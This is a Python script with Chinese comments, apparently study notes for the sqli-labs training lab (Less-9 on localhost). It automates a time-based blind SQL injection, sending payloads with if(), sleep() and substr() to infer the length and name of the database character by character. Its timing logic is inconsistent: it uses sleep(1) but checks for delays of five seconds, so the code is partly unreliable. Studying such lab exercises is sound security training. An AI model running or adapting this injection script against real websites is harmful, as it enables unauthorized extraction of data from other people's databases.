1. import requests,datetime
    2. def database_length():
    3.     for i in range(1,9):
    4.         url = "http://127.0.0.1/sql/Less-9/?id=1"
    5.         payload = "' and if(length(database())>%d,sleep(1),1)--+" % i
    6.         time1=datetime.datetime.now()
    7.         response = requests.get(url+payload)
    8.         time2=datetime.datetime.now()
    9.         if(time2-time1).seconds <5: #这里经测试SQLi最少以5秒开始,所以最小值为5
    10.             break
    11.     print('database_length:',i)
    12. database_length()
    14. def database_name():
    15.     #这里存储结果的值必须是全局的!!!,因为放在for循环中会被每次循环刷新掉
    16.     d_name=''
    17.     #定义结果的两个范围-->对应位置的对应的字符
    18.     for a in range(1,9):
    19.         for b in '0123456789abcdefghijklmnopqrstuvwxyz':
    20.             # 定义结果的两个范围-->对应位置的对应的字符
    21.             url = "http://127.0.0.1/sql/Less-9/?id=1"
    22.             payload = "' and if(substr(database(),%d,1)='%s',sleep(1),1)--+" % (a,str(b))
    23.             #通过访问url+payload的时间差来判断字符
    24.             time1 = datetime.datetime.now()
    25.             response = requests.get(url+payload)
    26.             time2 = datetime.datetime.now()
    27.             if(time2-time1).seconds >=5:  #这里不能通过<5,因为有多个字符串格式,会造成逻辑不对
    28.                 d_name+=b
    29.                 break
    30.         print('database_name:',d_name)
    31. database_name()

    结果:
    image.png